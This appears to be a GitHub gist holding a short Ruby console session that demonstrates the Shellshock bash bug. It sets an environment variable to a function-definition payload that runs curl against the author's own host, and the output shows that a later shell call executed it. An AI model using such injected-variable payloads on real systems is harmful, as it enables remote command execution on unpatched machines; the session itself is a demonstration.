-
-
Save cantino/9fe5f338e5027a46e2eb to your computer and use it in GitHub Desktop.
computers_suck.txt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
1.9.3-p484 :027 > ENV['x'] = '() { :;}; curl http://my.domain.com:8000' | |
=> "() { :;}; curl http://my.domain.com:8000" | |
1.9.3-p484 :028 > `uname -a 2>/dev/null` | |
% Total % Received % Xferd Average Speed Time Time Time Current | |
Dload Upload Total Spent Left Speed | |
100 178 100 178 0 0 2858 0 --:--:-- --:--:-- --:--:-- 2870 | |
=> "<!DOCTYPE html PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\"><html>\n<title>Directory listing for /</title>\n<body>\n<h2>Directory listing for /</h2>\n<hr>\n<ul>\n</ul>\n<hr>\n</body>\n</html>\n" | |
1.9.3-p484 :029 > |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment